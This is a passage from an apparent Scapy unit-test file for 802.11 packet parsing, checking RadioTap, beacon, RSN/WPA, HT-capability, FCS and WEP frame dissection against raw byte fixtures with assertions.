RadioTap(b'\x00\x00\x0f\x00*\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x08b\x00\x00\x01\x00^\x7f\xff\xfa\x0e\xec\xda\x1d\xa3M\x00\x0eX7\xbe\xbe\x00\x8aD#\x00\xa0D#\x00\xa0\x00\x00\x00\x00c\xb7\rv/s\x88N;>\x07\x0e\xe5\xd9\xf5\xfa\xcdD\xc2he\xfc\xc5^m\xae\xf2\xfe\xf9\xb06\xce\rt\xbe\x9d(\xb5\x98\x848NU\x0f\x93\x0f]m\xa2\x96\x80{\x95\x00\xb5\x98Y!\xa3^\xfc\xda\xca.R\xf3\xd3\xf8^\xeda\x88\x82p\xc6\xb8L\x0b\x815-\x85(\xb1F\xd5K\x166dJ\xc7\x04B\xdb\xec\x8d\xb7:{\x0f\'g<\x06\xd07>\xde\xad\x08\xcb\xffr\xfa\xf4}o\xe9\xa9b\xa5)\x87\x90\xa5{\xe1\xea\x0f\x0fGf`x1\xbd\xc1\xe8\xa0\xb6(\x05gq\xf3\x99\x9e\x93\xde\'\x8e\nQ\xf7\xad\xf7\x89"\xee\xcf\xe8$\x8a\x9c\xb4\xe6\x03\xab\x9ec\xd0\xd5\x08\xca\xd2\xbb\xae\xcc\x9c$R\xbc\xcdFO?\xc3Ah\x9ch\xd4\x9b)m\xea\xbab+\'\x06I2\xb5!\xdb\x03\xbe\xb8\xb2\x86\x0f\x80\n\xbc\x85\x02\xb4T\x00\x00\xc7|\xac\xc0B\xb2\x89\xbb\xc5\xc0\x93\x858\xe3Q\xf9\t\xff4\xdb\x9a>\xe5O-e\x16\x81w!9m\xb9dZ\xaa\xaa0\x9cW\xaa\xa3\xf1\xdd\xecW\xdd\xc41D\xe6\xba\xf3SQ\x81S\xf6\xbd\xe3\xc0e\xba\xa0*\x15%\x9cz0\xa8\xa6l\x8e\x0c(\xd3\xe4\xa2\xf9\xc2:Yae#T\x8d\xef\x01\xfad\x05/\xdb\xf2!D\xde~\x0f\x99\xf6U\xf5\xbf\xd0\xaf\xbe0\xf7\xf03\xa8s`\x8d>4\x98\xb5Y\x06dXFz\x88\x82\'B\x84\xe6\xca\x05\x02\xd5G\xb6\x11\xed <\xb1\xd4\xc9\xa9\xaa\xae\xc9\xb3g\xbc\xfd+\xe7\x1aG\x92\x17\xdb\xce\xf7\x843\xce4\xc4w\x8f\x8a\x83\xf0\'\xfe\x87\x14\x95\xd3\x0bM\xbaL$\xc8\x8d\' 8\x87c 3yt\xc5\xeeN\xc9\xe1\x95\x1d\xe9\xddh\x87E\x07\xe5\x86\xc7\x82\x8a\x88\x05\xa4\x06\xb1\x0c\xddV\xd0\xf0d\xc8\xcet`\xc5C\xcb\x8f\x06]A\x92\x1a\xae5wc\x8dN\xa2\xf0}aJ\x9c\x8e\xd1\xb2[*\xffK\x0f\xf8u\xd5\x84#\xc3"\xffX\x9f\xffC\x0fb\x02n\x1b\xbaAr\x93\xe1\xb7\x1f\x8e\x1c\xfev]w\xaa\xcch\x8c{lm\xb9\x9aE\x08\x1d\xc28u\x82\xa8\xbe\xf2\xb3\x11\xdc\x90 \x83\xa7\x9c*:\x01R\xcf\xd6\xc6~\x989\x9a5\xc97\xfa\x10\xe4!uEP\x968\x00*\xd0\xefE\xf8{\x1d(\xcb\xe3IR\\r\xee\x9fU\x14\ty\xe3\xdc\x96@\xf4\x8d\x17\xab\xcc\x98I\x8e\xe16\x9e\xa5+\xe0\xa8{S\x051##\x90:A') +assert Dot11CCMP in pkt + +assert pkt[Dot11CCMP].PN0 == 68 +assert pkt[Dot11CCMP].PN1 == 35 +assert pkt[Dot11CCMP].res0 == 0 +assert pkt[Dot11CCMP].key_id == 2 +assert pkt[Dot11CCMP].ext_iv == 1 +assert pkt[Dot11CCMP].res1 == 0 +assert pkt[Dot11CCMP].PN2 == 68 +assert pkt[Dot11CCMP].PN3 == 35 +assert pkt[Dot11CCMP].PN4 == 0 +assert pkt[Dot11CCMP].PN5 == 160 + += Dot11 - answers +a = Dot11()/Dot11Auth(seqnum=1) +b = Dot11()/Dot11Auth(seqnum=2) +assert b.answers(a) +assert not a.answers(b) + +assert not (Dot11()/Dot11Ack()).answers(Dot11()) +assert (Dot11()/LLC(dsap=2, ctrl=4)).answers(Dot11()/LLC(dsap=1, ctrl=5)) + += Dot11Beacon network_stats() + +data = b'\x00\x00\x12\x00.H\x00\x00\x00\x02\x8f\t\xa0\x00\x01\x01\x00\x00\x80\x00\x00\x00\xff\xff\xff\xff\xff\xffDH\xc1\xb7\xf0uDH\xc1\xb7\xf0u\x10\xb7\x00\x00\x00\x00\x00\x00\x00\x00\x90\x01\x11\x00\x00\x06SSID76\x01\n\x82\x84\x0c\x12\x18$0H`l\x03\x01\x080\x18\x01\x00\x00\x0f\xac\x04\x02\x00\x00\x0f\xac\x04\x00\x0f\xac\x02\x01\x00\x00\x0f\xac\x02\x0c\x00\x07\tUSI\x01\x18\x00\n\x05\xe7' +pkt = RadioTap(data) +nstats = pkt[Dot11Beacon].network_stats() +nstats +assert nstats == { + 'channel': 8, + 'crypto': {'WPA2/PSK'}, + 'rates': [1.0, 2.0, 6.0, 9.0, 12.0, 18.0, 24.0, 36.0, 48.0, 54.0], + 'ssid': 'SSID76', + 'country': 'US', + 'country_desc_type': 'Indoor' +} + +data = b'\x00\x00\x16\x00\x0f\x00\x00\x00|P\xb1\x82\xae\x86\x05\x00\x00\x02l\t\xa0\x00\x80\x00\x00\x00\xff\xff\xff\xff\xff\xff\x02\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00:Q\xb1\x82\xae\x86\x05\x00d\x00\x11\x04\x00\x0cWPA3-Network\x01\x08\x82\x84\x8b\x96\x0c\x12\x18$\x03\x01\x01\x05\x04\x00\x02\x00\x00*\x01\x042\x040H`l0\x14\x01\x00\x00\x0f\xac\x04\x01\x00\x00\x0f\xac\x04\x01\x00\x00\x0f\xac\x08\xc0\x00;\x02Q\x00\x7f\x08\x04\x00\x00\x00\x00\x00\x00@' +pkt = RadioTap(data) +nstats = pkt[Dot11Beacon].network_stats() +nstats +assert nstats == { + 'ssid': 'WPA3-Network', + 'rates': [1.0, 2.0, 5.5, 11.0, 6.0, 9.0, 12.0, 18.0, 24.0, 36.0, 48.0, 54.0], + 'channel': 1, + 'crypto': {'WPA3/SAE'} +} + + += Dot11EltCountry dissection + +data = b"\x00\x00&\x00/@\x00\xa0 \x08\x00\xa0 \x08\x00\x00R\xa9[#\x00\x00\x00\x00\x10\x18\x85\t\xc0\x00\xc8\x00\x00\x00\xc3\x00\xc7\x01P\x080\x00V\x9cm\xf4\xb1\xe9\xa0\xcf[\xfb%0\xa0\xcf[\xfb%0\xa0R&\x1a@\xc2\x06\x03\x00\x00f\x00!\x14\x00\x1eDisney Convention Center Guest\x01\x07\x12\x98$0H`l\x03\x01\x06\x07\x06US \x01\x0b\x1e\x0b\x05\n\x00\x8a\x8d[ \x01\x03*\x01\x00-\x1a,\x18\x1b\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x006\x03*L\x01=\x16\x06\x00\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00F\x05s\xc0\x00\x00\x00\x7f\x06\x00\x10\x00\x04\x01@\x85\x1e\x10\x00\x8f\x00\x0f\x00\xff\x03Y\x001617-AP33-SorcA\x00\n\x00\x00:\x96\x06\x00@\x96\x00\x0b\x00\xdd\x18\x00P\xf2\x02\x01\x01\x80\x00\x03\xa4\x00\x00'\xa4\x00\x00BC^\x00b2/\x00\xdd\x06\x00@\x96\x01\x01\x04\xdd\x05\x00@\x96\x03\x05\xdd\x05\x00@\x96\x0bI\xdd\x05\x00@\x96\x14\x00dZ\x97\xbf" +pkt = RadioTap(data) +assert pkt[Dot11EltCountry].info == b'US \x01\x0b\x1e' +assert len(pkt[Dot11EltCountry].descriptors) == 1 +assert pkt[Dot11EltCountry].descriptors[0].mtp == 30 + +* Country element: padding check +data = hex_bytes('00001a002f48000017cd9f3100000000000c3c144001e000000080000000ffffffffffff461b860bef06461b860bef06909403e0f75b0000000064001105000c4c697665626f782d3232353001088c1218243048606c0301240504020300000728504c202401172801172c01173001173401173801173c011740011764011e68011e6c011e70011e000b05000002ffff46050000000000200100c30502171717002a01002d1aef0117fffffffffeffffffff1f000001000000000018e6e719003d1624050000000000000000000000000000000000000000dd180050f2020101840003a4000027a4000042435e0062322f0030140100000fac040100000fac040100000fac020000bf0cb279c33faaff0000aaff0000c005012a00fcffdd1e002686010300dd00000025040592000601d15b5816830000000000000000dd06002686170000dd0e00268618010101024c1b860bef067f080100080200000040dd3b0050f204104a0001101044000102105700010110470010344331423836f042f546303634433142103c000103103c0001031049000600372a000120') +pkt = RadioTap(data) +assert pkt[Dot11EltCountry].pad == 0 +assert pkt.getlayer(Dot11Elt, ID=11) + +* Country element: Secondary padding check +erp_payload = b'\x1e\x2a\x01\x62' +country_payload = b'\x07\x06\x55\x53\x20\x01\x0b' + +bare_country = Dot11EltCountry(country_payload) +country_nested = Dot11EltCountry(country_payload + erp_payload) + +assert not bare_country.payload +assert country_nested.payload +assert country_nested.payload.ID == 42 + += RSNCipherSuite +assert bytes(RSNCipherSuite()) == b'\x00\x0f\xac\x04' +rsn = RSNCipherSuite(b'\x00\x0f\xac\x04') +assert rsn.oui == 0x0fac +assert rsn.cipher == 0x04 + += AKMSuite +assert bytes(AKMSuite()) == b'\x00\x0f\xac\x01' +akm = AKMSuite(b'\x00\x0f\xac\x01') +assert akm.oui == 0x0fac +assert akm.suite == 0x01 + += PMKIDListPacket +assert bytes(PMKIDListPacket()) == b'\x00\x00' +pmkids = PMKIDListPacket(b'\x01\x00LD\xfe\xf2l\xdcV\xce\x0b7\xab\xc62\x02O\x11') +assert pmkids.nb_pmkids == 1 +assert len(pmkids.pmkid_list) == 1 +assert pmkids.pmkid_list[0] == b'LD\xfe\xf2l\xdcV\xce\x0b7\xab\xc62\x02O\x11' + += Dot11EltRSN +assert bytes(Dot11EltRSN()) == b'0\x14\x01\x00\x00\x0f\xac\x04\x01\x00\x00\x0f\xac\x04\x01\x00\x00\x0f\xac\x01\x00\x00' +rsn_ie = Dot11EltRSN(b'0\x14\x01\x00\x00\x0f\xac\x04\x01\x00\x00\x0f\xac\x04\x01\x00\x00\x0f\xac\x01\x01\x00') +assert rsn_ie.group_cipher_suite.cipher == 0x04 +assert rsn_ie.nb_pairwise_cipher_suites == 0x01 +assert rsn_ie.pairwise_cipher_suites[0].cipher == 0x04 +assert rsn_ie.nb_akm_suites == 0x01 +assert rsn_ie.akm_suites[0].suite == 0x01 +assert rsn_ie.pre_auth +assert Dot11Elt in rsn_ie + +pkt = RadioTap(b"\x00\x000\x00/@\x00\xa0 \x08\x00\xa0 \x08\x00\xa0 \x08\x00\x00\x00\x00\x00\x00\x0bpin;%\xedN\x10\x0cl\t\xc0\x00\xce\x00\x00\x00\xb2\x00\xbd\x01\xce\x02\x80\x00\x00\x00\xff\xff\xff\xff\xff\xff\xec\x17/\x82\x1e)\xec\x17/\x82\x1e)\x10p\x81a\xa1\x08\x00\x00\x00\x00d\x001\x04\x00\rROUTE-821E295\x01\x01\x8c\x03\x01\x01\x05\x04\x00\x02\x00\x00\x07$IL \x01\x01\x14\x02\x01\x14\x03\x01\x14\x04\x01\x14\x05\x01\x14\x06\x01\x14\x07\x01\x14\x08\x01\x14\t\x01\x14\n\x01\x14\x0b\x01\x14;\x12QQRSTstuvwxyz{}~\x7f\x80*\x01\x000\x1a\x01\x00\x00\x0f\xac\x04\x01\x00\x00\x0f\xac\x04\x01\x00\x00\x0f\xac\x02\x8c\x00\x00\x00\x00\x0f\xac\x06-\x1a\x8d\x01\x1f\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00=\x16\x01\x00\x15\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xdd\x18\x00P\xf2\x02\x01\x01\x81\x00\x03\xa4\x00\x00'\xa4\x00\x00BT^\x00a2/\x00\x7f\x01\x04\xdd\x07\x00\xa0\xc6\x02\x02\x03\x00\xdd\x17\xec\x17/RRRRRRRRRRRRRRRRRRRRR\x9e[\xf2") +assert Dot11EltRSN in pkt +pkt[Dot11Beacon].network_stats() +assert pkt[Dot11Beacon].network_stats() == { + 'ssid': 'ROUTE-821E295', + 'rates': [6.0], + 'channel': 1, + 'country': 'IL', + 'country_desc_type': None, + 'crypto': {'WPA2/PSK'} +} +assert [x.ID for x in pkt[Dot11Elt].iterpayloads()] == [0, 1, 3, 5, 7, 59, 42, 48, 45, 61, 221, 127, 221, 221] +assert pkt.pmkids.nb_pmkids == 0 +assert pkt.group_management_cipher_suite.oui == 0xfac +assert pkt.group_management_cipher_suite.cipher == 0x6 + += Dot11EltMicrosoftWPA +assert bytes(Dot11EltMicrosoftWPA()) == b'\xdd\x16\x00P\xf2\x01\x01\x00\x00\x0f\xac\x04\x01\x00\x00\x0f\xac\x04\x01\x00\x00\x0f\xac\x01' +ms_wpa_ie = Dot11EltMicrosoftWPA(b'\xdd\x1a\x00P\xf2\x01\x01\x00\x00P\xf2\x02\x02\x00\x00P\xf2\x04\x00P\xf2\x02\x01\x00\x00P\xf2\x01') +assert ms_wpa_ie[Dot11EltMicrosoftWPA].type == 0x01 +assert ms_wpa_ie[Dot11EltMicrosoftWPA].version == 0x01 +assert ms_wpa_ie[Dot11EltMicrosoftWPA].group_cipher_suite.cipher == 0x02 +assert ms_wpa_ie[Dot11EltMicrosoftWPA].nb_pairwise_cipher_suites == 0x02 +assert ms_wpa_ie[Dot11EltMicrosoftWPA].pairwise_cipher_suites[0].cipher == 0x04 +assert ms_wpa_ie[Dot11EltMicrosoftWPA].pairwise_cipher_suites[1].cipher == 0x02 +assert ms_wpa_ie[Dot11EltMicrosoftWPA].nb_akm_suites == 0x01 +assert ms_wpa_ie[Dot11EltMicrosoftWPA].akm_suites[0].suite == 0x01 +assert Dot11Elt in ms_wpa_ie + += Dot11EltVendorSpecific +assert bytes(Dot11EltVendorSpecific()) == b'\xdd\x03\x00\x00\x00' +vendor_specific_ie = Dot11EltVendorSpecific(b'\xdd\t\x00\x03\x7f\x01\x01\x00\x00\xff\x7f') +assert vendor_specific_ie.oui == 0x00037f +assert Dot11Elt in vendor_specific_ie + += Beacon with RSN IE +f = Dot11(b"\x80\x00\x00\x00\xff\xff\xff\xff\xff\xffLN5V\xee\x03LN5V\xee\x03\xf0\x8f\x80\x01\xdc7\x00\x00\x00\x00\x90\x011\x04\x00\x0cciscosb-wpa2\x01\x08\x82\x84\x8b\x96\x0c\x12\x18$\x03\x01\x06\x05\x04\x00\x01\x00\x00*\x01\x000\x14\x01\x00\x00\x0f\xac\x04\x01\x00\x00\x0f\xac\x04\x01\x00\x00\x0f\xac\x01\x01\x002\x040H`l\xdd\x18\x00P\xf2\x02\x01\x01\x84\x00\x03\xa4\x00\x00'\xa4\x00\x00BC^\x00b2/\x00\xdd\x1e\x00\x90L3L\x10\x1b\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00-\x1aL\x10\x1b\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xdd\x1a\x00\x90L4\x06\x08\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00=\x16\x06\x08\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00J\x0e\x14\x00\n\x00,\x01\xc8\x00\x14\x00\x05\x00\x19\x00\x7f\x01\x01\xdd\t\x00\x03\x7f\x01\x01\x00\x00\xff\x7f\xdd\n\x00\x03\x7f\x04\x01\x00\x06\x00@\x00") +assert Dot11EltRSN in f +assert f[Dot11EltRSN].len == 20 +assert f[Dot11EltRSN].group_cipher_suite[0].cipher == 0x04 +assert f[Dot11EltRSN].pairwise_cipher_suites[0].cipher == 0x04 +assert f[Dot11EltRSN].akm_suites[0].suite == 0x01 + += Beacon with Microsoft WPA IE +f = Dot11(b"\x80\x00\x00\x00\xff\xff\xff\xff\xff\xffNN5V\xee\x03NN5V\xee\x030\x8f\x80\x01\xdc7\x00\x00\x00\x00\x90\x011\x04\x00\x0bciscosb-wpa\x01\x08\x82\x84\x8b\x96\x0c\x12\x18$\x03\x01\x06\x05\x04\x00\x01\x00\x00*\x01\x00\xdd\x16\x00P\xf2\x01\x01\x00\x00P\xf2\x04\x01\x00\x00P\xf2\x04\x01\x00\x00P\xf2\x012\x040H`l\xdd\x18\x00P\xf2\x02\x01\x01\x85\x00\x03\xa4\x00\x00'\xa4\x00\x00BC^\x00b2/\x00\xdd\x1e\x00\x90L3L\x10\x1b\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00-\x1aL\x10\x1b\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xdd\x1a\x00\x90L4\x06\x08\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00=\x16\x06\x08\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00J\x0e\x14\x00\n\x00,\x01\xc8\x00\x14\x00\x05\x00\x19\x00\x7f\x01\x01\xdd\t\x00\x03\x7f\x01\x01\x00\x00\xff\x7f\xdd\n\x00\x03\x7f\x04\x01\x00\x06\x00@\x00") +assert Dot11EltMicrosoftWPA in f +assert f[Dot11EltMicrosoftWPA].type == 0x01 +assert f[Dot11EltMicrosoftWPA].version == 0x01 +assert f[Dot11EltMicrosoftWPA].group_cipher_suite.cipher == 0x04 +assert f[Dot11EltMicrosoftWPA].nb_pairwise_cipher_suites == 0x01 +assert f[Dot11EltMicrosoftWPA].pairwise_cipher_suites[0].cipher == 0x04 +assert f[Dot11EltMicrosoftWPA].nb_akm_suites == 0x01 +assert f[Dot11EltMicrosoftWPA].akm_suites[0].suite == 0x01 + += HT Capabilities +f = RadioTap(b"\x00\x00&\x00/@\x00\xa0 \x08\x00\xa0 \x08\x00\x00\x9dt\xc3\xf1\x18\x00\x00\x00\x10\x02l\t\xa0\x00\xd9\x00\x00\x00\xd3\x00\xd7\x01@\x00\x00\x00\xff\xff\xff\xff\xff\xff\xaa\xaa\xaa\xaa\xaa\xaa\xff\xff\xff\xff\xff\xffP'\x00\x00\x01\x04\x02\x04\x0b\x162\x08\x0c\x12\x18$0H`l\x03\x01\x01-\x1a-@\x17\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x7f\x08\x00\x00\x08\x04\x00\x00\x00@Y\xb7T\x13") +assert Dot11EltHTCapabilities in f +assert f.L_SIG_TXOP_Protection == 0 +assert f.Forty_Mhz_Intolerant == 1 +assert f.PSMP == 0 +assert f.DSSS_CCK == 0 +assert f.Max_A_MSDU == 0 +assert f.Delayed_BlockAck == 0 +assert f.Rx_STBC == 0 +assert f.Tx_STBC == 0 +assert f.Short_GI_40Mhz == 0 +assert f.Short_GI_20Mhz == 1 +assert f.Green_Field == 0 +assert f.SM_Power_Save == 3 +assert f.Supported_Channel_Width == 0 +assert f.LDPC_Coding_Capability == 1 +assert f.res1 == 0 +assert f.Min_MPDCU_Start_Spacing == 5 +assert f.Max_A_MPDU_Length_Exponent == 3 +assert f.TX_Unequal_Modulation == 0 +assert f.TX_Max_Spatial_Streams == 0 +assert f.TX_RX_MCS_Set_Not_Equal == 0 +assert f.TX_MCS_Set_Defined == 0 +assert f.RX_Highest_Supported_Data_Rate == 0 +assert f.RX_MSC_Bitmask == 255 +assert f.RD_Responder == 0 +assert f.HTC_HT_Support == 0 +assert f.MCS_Feedback == 0 +assert f.PCO_Transition_Time == 0 +assert f.PCO == 0 +assert f.Channel_Estimation_Capability == 0 +assert f.CSI_max_n_Rows_Beamformer_Supported == 0 +assert f.Compressed_Steering_n_Beamformer_Antennas_Supported == 0 +assert f.Noncompressed_Steering_n_Beamformer_Antennas_Supported == 0 +assert f.CSI_n_Beamformer_Antennas_Supported == 0 +assert f.Minimal_Grouping == 0 +assert f.Explicit_Compressed_Beamforming_Feedback == 0 +assert f.Explicit_Noncompressed_Beamforming_Feedback == 0 +assert f.Explicit_Transmit_Beamforming_CSI_Feedback == 0 +assert f.Explicit_Compressed_Steering == 0 +assert f.Explicit_Noncompressed_Steering == 0 +assert f.Explicit_CSI_Transmit_Beamforming == 0 +assert f.Calibration == 0 +assert f.Implicit_Trasmit_Beamforming == 0 +assert f.Transmit_NDP == 0 +assert f.Receive_NDP == 0 +assert f.Transmit_Staggered_Sounding == 0 +assert f.Receive_Staggered_Sounding == 0 +assert f.Implicit_Transmit_Beamforming_Receiving == 0 +assert f.ASEL == 0 + += HT Capabilities with fuzzed values +# Those were checked with Wireshark ! +f = RadioTap(b'\x00\x00\t\x00\x02\x00\x00\x00\x10@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00-\x1a\xecH\xbf\x85!\x02\xd0m\x91\xa8\xd9\xf0\xa9\xb8\x15\xae\x00\x00\x00,Y\x86\xb3H\xa7?Z\xd2\xa8\xc2') +assert Dot11EltHTCapabilities in f +assert f.L_SIG_TXOP_Protection == 0 +assert f.Forty_Mhz_Intolerant == 1 +assert f.PSMP == 0 +assert f.DSSS_CCK == 0 +assert f.Max_A_MSDU == 1 +assert f.Delayed_BlockAck == 0 +assert f.Rx_STBC == 0 +assert f.Tx_STBC == 1 +assert f.Short_GI_40Mhz == 1 +assert f.Short_GI_20Mhz == 1 +assert f.Green_Field == 0 +assert f.SM_Power_Save == 3 +assert f.Supported_Channel_Width == 0 +assert f.LDPC_Coding_Capability == 0 +assert f.res1 == 5 +assert f.Min_MPDCU_Start_Spacing == 7 +assert f.Max_A_MPDU_Length_Exponent == 3 +assert f.TX_Unequal_Modulation == 0 +assert f.TX_Max_Spatial_Streams == 3 +assert f.TX_RX_MCS_Set_Not_Equal == 1 +assert f.TX_MCS_Set_Defined == 0 +assert f.RX_Highest_Supported_Data_Rate == 440 +assert f.RX_MSC_Bitmask == 46944200869120244326789 +assert f.RD_Responder == 1 +assert f.HTC_HT_Support == 0 +assert f.MCS_Feedback == 1 +assert f.PCO_Transition_Time == 2 +assert f.PCO == 0 +assert f.Channel_Estimation_Capability == 0 +assert f.CSI_max_n_Rows_Beamformer_Supported == 3 +assert f.Compressed_Steering_n_Beamformer_Antennas_Supported == 2 +assert f.Noncompressed_Steering_n_Beamformer_Antennas_Supported == 2 +assert f.CSI_n_Beamformer_Antennas_Supported == 1 +assert f.Minimal_Grouping == 0 +assert f.Explicit_Compressed_Beamforming_Feedback == 1 +assert f.Explicit_Noncompressed_Beamforming_Feedback == 1 +assert f.Explicit_Transmit_Beamforming_CSI_Feedback == 2 +assert f.Explicit_Compressed_Steering == 0 +assert f.Explicit_Noncompressed_Steering == 1 +assert f.Explicit_CSI_Transmit_Beamforming == 1 +assert f.Calibration == 2 +assert f.Implicit_Trasmit_Beamforming == 0 +assert f.Transmit_NDP == 0 +assert f.Receive_NDP == 0 +assert f.Transmit_Staggered_Sounding == 1 +assert f.Receive_Staggered_Sounding == 1 +assert f.Implicit_Transmit_Beamforming_Receiving == 0 +assert f.ASEL.resTransmit_Sounding_PPDUs +assert f.ASEL.Receive_ASEL +assert f.ASEL.Antenna_Indices_Feedback +assert f.ASEL.Explicit_CSI_Feedback +assert f.ASEL.Explicit_CSI_Feedback_Based_Transmit_ASEL +assert f.ASEL.Antenna_Selection +assert f.ASEL == 63 + += RadioTap - MCS weird padding +f = RadioTap(b'\x00\x00,\x00K\x08\x1c\x00"b\x96\x03\x00\x00\x00\x00\x10\x00l\t\x80\x04\xb0\x00\x80\x04\x01\x00l\t\x01\x00\x1f\x08\x0c\x00\x94\x05\x00\x00\x04\x00\x00\x00\x88\x020\x00.\xdf\xc4J\xb0\xdc\xa0c\x91sf\xech\x05\xca?\xf4h@Y\x00\x00\xaa\xaa\x03\x00\x00\x00\x08\x00E\x00\x05\xdc \xcf@\x00\x80\x06P\xf0\xc0\xa8\x01\n\xc0\xa8\x01\x02\xdb\x8f\x13\x89\xfbv\xa3\xde\xf6\xd8L\xe8P\x10\xff\xfft\xdd\x00\x0023456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901O\xdc\x01x') +assert f.knownMCS == 31 +assert f.Ness_LSB == 0 +assert f.STBC_streams == 0 +assert f.FEC_type == 0 +assert f.HT_format == 1 +assert f.guard_interval == 0 +assert f.MCS_bandwidth == 0 +assert f.MCS_index == 0xc +assert f.A_MPDU_ref == 1428 + += Reassociation request +f = Dot11(b' \x00:\x01@\xe3\xd6\x7f*\x00\x00\x10\x18\xa9l.@\xe3\xd6\x7f*\x00 \t1\x04\n\x00@\xe3\xd6\x7f*\x00\x00\x064.2.12\x01\x08\x82\x84\x0b\x16$0Hl!\x02\x08\x1a$\x02\x01\x0b0&\x01\x00\x00\x0f\xac\x04\x01\x00\x00\x0f\xac\x04\x01\x00\x00\x0f\xac\x01\x00\x00\x01\x00LD\xfe\xf2l\xdcV\xce\x0b7\xab\xc62\x02O\x112\x04\x0c\x12\x18`\x7f\x08\x01\x00\x00\x00\x00\x00\x00@\xdd\t\x00\x10\x18\x02\x00\x00\x10\x00\x00') +assert Dot11EltRSN in f +assert f[Dot11EltRSN].pmkids.nb_pmkids == 1 +assert len(f[Dot11EltRSN].pmkids.pmkid_list) == 1 +assert f[Dot11EltRSN].pmkids.pmkid_list[0] == b'LD\xfe\xf2l\xdcV\xce\x0b7\xab\xc62\x02O\x11' + += Backward compatibility of Dot11Elt + +# Old naming scheme +assert Dot11Elt(ID="DSset").sprintf("%ID%") == 'DSSS Set' +assert Dot11Elt(ID="RSNinfo").sprintf("%ID%") == 'RSN' + += Dot11FCS parent matching + +pkt = Ether()/IP()/Dot11FCS() +assert pkt[Dot11] + += Dot11FCS - test FCS with FCSField + +data = b'\x00\x00 \x00\xae@\x00\xa0 \x08\x00\xa0 \x08\x00\x00\x10\x02\x85\t\xa0\x00\xe2\x00d\x00\x00\x00\x00\x00\x00\x01\xa0@:\x01\x00\xc0\xca\xa4}PLfA\xac\xe4\xb3\x00\xc0\xca\xa4}P\x00\x03\x00 \x08 \x00\x00\x00\x00\x0f)\x1d\xd4\xd49\x1f>4\xeb' +pkt = RadioTap(data) +w_payload = hex_bytes('00002000ae4000a0200800a02008000010028509a000e2006400000000000001a0403a0100c0caa47d504c6641ace4b300c0caa47d50000300200820000000000f291dd4d4391f3e34eb') +assert raw(pkt) == w_payload + += Dot11FCS computation + +pkt = RadioTap() / Dot11FCS() / Dot11Beacon() +assert raw(pkt) == b'\x00\x00\t\x00\x02\x00\x00\x00\x10\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00d\x00\x00\x00e\xd9=\xb9' + += WEP tests +~ wifi crypto Dot11 LLC SNAP IP TCP +conf.wepkey = "" +bck_conf_crypto_valid = conf.crypto_valid +p = Dot11WEP(b'\x00\x00\x00\x00\xe3OjYLw\xc3x_%\xd0\xcf\xdeu-\xc3pH#\x1eK\xae\xf5\xde\xe7\xb8\x1d,\xa1\xfe\xe83\xca\xe1\xfe\xbd\xfe\xec\x00)T`\xde.\x93Td\x95C\x0f\x07\xdd') +assert isinstance(p, Dot11WEP) +conf.crypto_valid = bck_conf_crypto_valid + +conf.wepkey = "Fobar" +r = raw(Dot11WEP()/LLC()/SNAP()/IP()/TCP(seq=12345678)) +r +assert(r == b'\x00\x00\x00\x00\xe3OjYLw\xc3x_%\xd0\xcf\xdeu-\xc3pH#\x1eK\xae\xf5\xde\xe7\xb8\x1d,\xa1\xfe\xe83\xca\xe1\xfe\xbd\xfe\xec\x00)T`\xde.\x93Td\x95C\x0f\x07\xdd') +p = Dot11WEP(r) +p +assert(TCP in p and p[TCP].seq == 12345678) + += RadioTap - dissection & build +data = 